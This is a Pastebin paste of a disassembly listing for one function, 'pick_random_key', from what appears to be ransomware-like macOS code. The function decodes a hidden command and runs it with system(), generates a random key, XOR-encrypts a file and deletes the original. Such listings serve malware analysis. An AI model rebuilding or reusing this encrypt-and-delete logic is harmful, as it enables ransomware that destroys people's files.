Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ┌ (fcn) func.homemade.pick_random_key 268
- │ func.homemade.pick_random_key ();
- │ ; var int local_d0h @ rbp-0xd0
- │ ; var int local_c0h @ rbp-0xc0
- │ ; var int local_b8h @ rbp-0xb8
- │ ; var int local_b4h @ rbp-0xb4
- │ ; var int local_b0h @ rbp-0xb0
- │ ; var int local_a8h @ rbp-0xa8
- │ ; var int local_28h @ rbp-0x28
- │ ; CALL XREF from 0x100001768 (entry0)
- │ ; CALL XREF from 0x1000016e1 (entry0)
- │ 0x100002050 55 push rbp
- │ 0x100002051 4889e5 mov rbp, rsp
- │ 0x100002054 4157 push r15
- │ 0x100002056 4156 push r14
- │ 0x100002058 4154 push r12
- │ 0x10000205a 53 push rbx
- │ 0x10000205b 4881ecb00000. sub rsp, 0xb0
- │ 0x100002062 4989fe mov r14, rdi
- │ 0x100002065 488b05940f00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000206c 488b00 mov rax, qword [rax]
- │ 0x10000206f 488945d8 mov qword [local_28h], rax
- │ 0x100002073 0f2805060f00. movaps xmm0, xmmword [fcn.100002f80] ; [0x100002f80:16]=-1 ; "-\xd9\xec\x941\x96\xb9\xda:\xc2\xb9\xc5i\x87\xaf\xc7j\x83\xad\xc5i\x82\xad\xc6j\x87\xa1\xc6l\x85\xa9\xc4\x01"
- │ 0x10000207a 0f298530ffff. movaps xmmword [local_d0h], xmm0
- │ 0x100002081 48b86f86aec6. movabs rax, 0xd7ab8769c6ae866f
- │ 0x10000208b 48898540ffff. mov qword [local_c0h], rax
- │ 0x100002092 c78548ffffff. mov dword [local_b8h], 0xd0ea937e
- │ 0x10000209c c6854cffffff. mov byte [local_b4h], 0
- │ 0x1000020a3 488dbd30ffff. lea rdi, [local_d0h]
- │ 0x1000020aa e881feffff call func.homemade.decode_buffer
- │ 0x1000020af 4889c1 mov rcx, rax
- │ 0x1000020b2 488d9d50ffff. lea rbx, [local_b0h]
- │ 0x1000020b9 be00000000 mov esi, 0 ; const char*
- │ 0x1000020be ba80000000 mov edx, 0x80 ; rdx ; ...
- │ 0x1000020c3 31c0 xor eax, eax
- │ 0x1000020c5 4889df mov rdi, rbx ; char *s
- │ 0x1000020c8 4d89f0 mov r8, r14
- │ 0x1000020cb e856070000 call sym.imp.__sprintf_chk ; int sprintf(char *s,
- │ 0x1000020d0 4889df mov rdi, rbx ; const char * string
- │ 0x1000020d3 e826080000 call sym.imp.system ; int system(const char *string)
- │ 0x1000020d8 4c89b550ffff. mov qword [local_b0h], r14
- │ 0x1000020df e854070000 call sym.imp.arc4random ; int rand(void)
- │ 0x1000020e4 4189c7 mov r15d, eax
- │ 0x1000020e7 41ffc7 inc r15d
- │ 0x1000020ea e849070000 call sym.imp.arc4random ; int rand(void)
- │ 0x1000020ef 4189c4 mov r12d, eax
- │ 0x1000020f2 41ffc4 inc r12d
- │ 0x1000020f5 e83e070000 call sym.imp.arc4random ; int rand(void)
- │ 0x1000020fa 89c3 mov ebx, eax
- │ 0x1000020fc ffc3 inc ebx
- │ 0x1000020fe e835070000 call sym.imp.arc4random ; int rand(void)
- │ 0x100002103 ffc0 inc eax
- │ 0x100002105 4963cf movsxd rcx, r15d
- │ 0x100002108 4963d4 movsxd rdx, r12d
- │ 0x10000210b 480fafd1 imul rdx, rcx
- │ 0x10000210f 4863cb movsxd rcx, ebx
- │ 0x100002112 4898 cdqe
- │ 0x100002114 480fafc1 imul rax, rcx
- │ 0x100002118 480fafc2 imul rax, rdx
- │ 0x10000211c 48898558ffff. mov qword [local_a8h], rax
- │ 0x100002123 488dbd50ffff. lea rdi, [local_b0h]
- │ 0x10000212a e831000000 call func.homemade.encrypt_file_with_XOR
- │ 0x10000212f 4c89f7 mov rdi, r14 ; const char * filename
- │ 0x100002132 e89d070000 call sym.imp.remove ; int remove(const char *filename)
- │ 0x100002137 488b05c20e00. mov rax, qword [reloc.__stack_chk_guard_0] ; [0x100003000:8]=0
- │ 0x10000213e 488b00 mov rax, qword [rax]
- │ 0x100002141 483b45d8 cmp rax, qword [local_28h]
- │ ┌─< 0x100002145 7510 jne 0x100002157
- │ │ 0x100002147 4881c4b00000. add rsp, 0xb0
- │ │ 0x10000214e 5b pop rbx
- │ │ 0x10000214f 415c pop r12
- │ │ 0x100002151 415e pop r14
- │ │ 0x100002153 415f pop r15
- │ │ 0x100002155 5d pop rbp
- │ │ 0x100002156 c3 ret
- └ └─> 0x100002157 e8d0060000 call sym.imp.__stack_chk_fail ; void __stack_chk_fail(void)
Add Comment
Please, Sign In to add comment